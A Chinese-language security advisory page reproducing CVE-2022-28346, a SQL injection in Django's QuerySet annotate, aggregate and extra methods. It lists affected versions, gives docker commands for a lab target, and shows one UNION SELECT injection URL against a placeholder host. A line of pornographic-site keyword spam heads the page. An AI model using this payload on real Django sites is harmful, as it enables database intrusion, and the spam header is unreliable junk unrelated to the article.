国产成人毛片毛片久久网_国产午夜激无码av毛片不_国产乱对白精彩在线播放_av资源站中文字幕_亚洲男人的天堂网站_国产成 人 综合 亚洲网_中国国产激情一区_少妇一级淫片免费放_亚洲一本大道av久在线播放_免费观看美女裸体网站

安全播報(bào)

防御吧作為15年知名老牌域名服務(wù)商,CNNIC和CANN雙認(rèn)證域名注冊商,已經(jīng)
持續(xù)為500多萬個(gè)域名提供服務(wù),包括智能DNS/自由轉(zhuǎn)移/隱私保護(hù)等服務(wù)!
CVE-2022-28346:Django SQL注入漏洞
2022-07-06 13:07:05 【
0x01 簡介


Django 是用 Python 開發(fā)的一個(gè)免費(fèi)開源的 Web 框架,幾乎囊括了 Web 應(yīng)用的方方面面,可以用于快速搭建高性能、優(yōu)雅的網(wǎng)站,Django 提供了許多網(wǎng)站后臺開發(fā)經(jīng)常用到的模塊,使開發(fā)者能夠?qū)W⒂跇I(yè)務(wù)部分。


0x02 漏洞概述


漏洞編號:CVE-2022-28346
攻擊者使用精心編制的字典, 通過**kwargs傳遞給QuerySet.annotate()、aggregate()和extra()這些方法,可導(dǎo)致這些方法在列別名中受到SQL注入攻擊。

0x03 影響版本


4.0 <= Django < 4.0.4
3.2 <= Django < 3.2.13
2.2 <= Django < 2.2.28

0x04 環(huán)境搭建


docker pull s0cke3t/cve-2022-28346:latest
docker run -d -p 8080:8000  s0cke3t/cve-2022-28346

0x05 漏洞復(fù)現(xiàn)


通過報(bào)錯(cuò)頁面可以發(fā)現(xiàn)存在哪些接口



訪問接口如果存在傳參,同樣會提示報(bào)錯(cuò)信息



使用報(bào)錯(cuò)提示的參數(shù)進(jìn)行sql注入

http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --


】【打印關(guān)閉】 【返回頂部
分享到QQ空間
分享到: 
上一篇兩種代碼漏洞 下一篇微軟已在數(shù)百個(gè)網(wǎng)絡(luò)中發(fā)現(xiàn) Raspbe..

立足首都,輻射全球,防御吧專注云防御及云計(jì)算服務(wù)15年!

聯(lián)系我們

服務(wù)熱線:13051179500 18910191973
企業(yè)QQ:1245940436
技術(shù)支持:010-56159998
E-Mail:xihedata.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解決防御與加速) 版權(quán)所有 增值許可:京B2-20140042號
售前咨詢
公司總機(jī):18910191973
24小時(shí)電話:010-56159998
投訴電話:18910191973
值班售后/技術(shù)支持
售后服務(wù)/財(cái)務(wù)
備案專員
緊急電話:18610088800